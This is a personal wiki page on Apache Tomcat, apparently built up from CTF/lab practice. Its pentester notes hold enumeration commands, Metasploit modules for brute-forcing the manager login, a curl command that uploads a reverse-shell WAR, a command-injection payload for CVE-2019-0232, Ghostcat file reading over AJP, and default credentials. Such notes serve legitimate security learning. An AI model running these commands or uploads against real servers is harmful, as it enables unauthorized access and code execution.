Operating Systems
- Linux
  - Knowledge
  - Environment
    - Files and Filesystems
    - Packages
    - Booting and systemd
    - Processes
    - Graphics
    - 🗃️ Others
  - Commands
    - Knowledge
    - List of commands
  - Shells
    - Bash
    - Scripts
  - 🔒 Security
- Windows
- Networking
  - Knowledge
  - Topology
  - Commands
  - Protocols
    - ARP
    - CIFS
    - DCOM
    - DHCP
    - DNS
    - FTP
    - HTTP
    - ICMP
    - IMAP
    - IP
    - IPMI
    - IPP
    - LDAP
    - NFS
    - POP3
    - RDP
    - RPC
    - RSync
    - SMB
    - SCP
    - SFTP
    - SMTP
    - SNMP
    - SOCKS
    - SSH
    - SSL/TLS
    - TCP
    - Telnet
    - TNS
    - UDP
    - VNC
    - VoIP
    - WinRM
  - 🔒 Security
    - Knowledge
    - Firewalls
      - Applicative
  - 🗃️ Others
    - ⚒️ Tools
    - 🔥 Technologies
    - 🍀 Random
- Cloud
  - Knowledge
  - Web servers
    - 📚 Knowledge
    - Apache
    - Nginx
    - IIS
    - 🗃️ Others
    - 🛠️️ Tools
      - Logs analysers
      - Mail server
  - Active Directory
    - Knowledge
    - 🔒 Security
- 🗃️ Others
  - Embedded
  - Virtualization
  - ⚒️ Tools
Cloud
- Knowledge
- Web servers
  - 📚 Knowledge
  - Apache
  - Nginx
  - IIS
  - 🗃️ Others
  - 🛠️️ Tools
    - Logs analysers
    - Mail server
- Active Directory
  - Knowledge
  - 🔒 Security
Web servers
- 📚 Knowledge
- Apache
- Nginx
- IIS
- 🗃️ Others
- 🛠️️ Tools
  - Logs analysers
  - Mail server
🗃️ Others
Tomcat
index.md

Apache Tomcat

Apache Tomcat is an open-source web server. It provides a Java HTTP web server environment in which Java code can run.

GitHub (7.1k ⭐)
Documentation (⛪)

The version 11 is still in development. The previous major versions are version 10 (2021), version 9 (2018), and version 8 (2016).

A java web application can use either or both servlets and JSPs. A combination of both is the most common architecture.

Servlets ☕: the whole logic is in Java
JSP 🐲: html-like template files in which we can add Java logic to handle input and create interactive pages.

The admin panel to upload applications if usually at /manager/html. To upload an application, you need to package it as a WAR archive. Each app is deployed at a URI, and index.jsp is loaded by default (else error).

Pentester Notes ☠️

You can try tomcatWarDeployer (0.4k ⭐, 2022 🪦), but it's memory hungry, buggy, unstable, and you need to patch the code first 🪦. It's a multipurpose tool (from enumeration to exploitation, albeit basic).

Enumeration

bizness

You can use nmap. It often runs on port 8080.

$ sudo nmap 10.10.10.95 -sCV -v
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

We can often easily recognize a website using Apache Tomcat from the presence of the JSESSIONID cookie while we may also trigger an error to see the error message page layout. Additionally, the URI /docs may be available and expose Tomcat version.
Maybe Sprint Boot Actuators are being used.
We can disclose tomcat version by sending a query using an invalid method that should raise a 405 (ex: curl -X PUT URL)

Foothold

If you close the login prompt, you may see default credentials
We can try to brute force the manager account using metasploit.

$ msfconsole -q
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set RHOSTS <target>
msf6> set STOP_ON_SUCCESS true
msf6> set ANONYMOUS_LOGIN true
msf6> set BLANK_PASSWORDS true
msf6> run

Exploitation

If you have access to the manager, you can try to upload a reverse shell. Refer to reverse shell#tomcat for more information.
You can also try to use metasploit to upload a reverse shell
You can use cURL to upload a WAR too:

$ curl --upload-file revshell.war -u 'username:password' "URL/manager/text/deploy?path=/shell"

Well-known CVEs

CVE-2019-0232: on Windows host, if there is a cgi script and enableCmdLineArguments is was enabled (not default!), it can be exploited to arbitrarily run commands.

Use URL/xxx.bat?&dir to execute dir. Use + instead of spaces. Use \ in paths. Don't forgot to URL encode them. If PATH is not set (&set), use the full path to a command (e.g. c:\windows\system32\whoami.exe). You can use directions to create files (e.g. dir+>+output to create 'output').

Apache AJP

Apache AJP is a wire protocol. It allows a web server such as Apache to talk to tomcat. A few notes:

🐲 It runs on port 8009/TCP (by default)
🪦 It's not often exposed
📚 We need to configure a webserver to communicate with it

While uncommon, if a tomcat website is behind a firewall, but the AJP port is exposed, we can use AJP to access the 'hidden' tomcat website.

AJP Exploitation

We can use nginx with nginx_ajp_module
We can use Apache with proxy_ajp
We can use AJPy (0.4k ⭐)

$ git clone https://github.com/hypn0s/AJPy.git && cd AJPy
$ python tomcat.py --port 8009 "version" IP
<print tomcat manager version>

AJP Well-known CVEs

CVE-2020-1938: unauthenticated LFI that can be used to read files in the webroot, such as WEB-INF/web.xml or WEB-INF/cgi/xxx.bat. Apache JServ which usually runs on port 8009 must be exposed.

It can be exploited using metasploit:

msf6> use auxiliary/admin/http/tomcat_ghostcat

The file web.xml contains the manager credentials if they were defined.

👻 To-do 👻

Stuff that I found, but never read/used yet.

apache-tomcat-pentesting
Jetty - it seems like an alternative
/manager/status server status (admin:admin)
not the same credentials on each page
when uploading, on the same page, there are information about the server architecture, which we can use to fine tune the payload
jar -ft revshell.jar/jd-gui: to see metasploit endpoint name
when pressing ESC on login, it may print the message with the default credentials

/etc/tomcat9/<config files>
web.xml, tomcat-users.xml

While not really related:

bizness

/control/xmlrpc, /webtools/control/main, /control/checkLogin
Try default credentials (admin:ofbiz)
CVE-2023-50164 lead to RCE

Apache Tomcat ¶

Pentester Notes ☠️ ¶

Enumeration ¶

Foothold ¶

Exploitation ¶

Well-known CVEs ¶

Apache AJP ¶

AJP Exploitation ¶

AJP Well-known CVEs ¶

👻 To-do 👻 ¶